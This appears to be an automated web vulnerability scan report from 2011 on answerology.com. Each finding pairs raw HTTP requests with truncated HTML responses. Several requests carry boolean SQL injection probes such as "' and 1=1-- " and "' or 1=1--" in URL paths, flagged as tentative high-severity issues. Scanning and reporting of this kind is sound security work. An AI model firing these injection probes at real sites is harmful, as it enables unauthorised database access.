GET /varw/getPromo?conId Host: syn.verticalacuity.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 17 Sep 2011 16:32:04 GMT Expires: Thu, 01-Jan-1970 00:00:00 GMT Server: nginx Set-Cookie: JSESSIONID=wz5uxs7uk Content-Length: 1392 Connection: keep-alive (function() { var BASE_URL = 'http://syn.vertical var dataVar = 'recData' || 'data'; var data = {"baseUrl":"http://syn if(!window.VAData){window })(); |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | / |
GET /?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:27 GMT Content-Length: 58819 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Relationship Advice - Get Answers to Relationship Questions</title> <meta name=" ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:27 GMT Content-Length: 58840 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Relationship Advice - Get Answers to Relationship Questions</title> <meta name=" ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmogirl |
GET /cobrands'%20and%201%3d1--%20/cosmogirl/Cosmogirl Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands'%20and%201%3d2--%20/cosmogirl/Cosmogirl Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmopolitan |
GET /cobrands'%20and%201%3d1--%20/cosmopolitan/Cosmop Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:46 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands'%20and%201%3d2--%20/cosmopolitan/Cosmop Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:46 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmopolitan |
GET /cobrands/cosmopolitan Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/cosmopolitan Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/goodhousek |
GET /cobrands/goodhousek Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/goodhousek Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:56 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/marieclaire |
GET /cobrands/marieclaire'%20and%201%3d1--%20/MarieClaireLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands/marieclaire'%20and%201%3d2--%20/MarieClaireLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/quickandsimple |
GET /cobrands/quickandsimple10784842'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
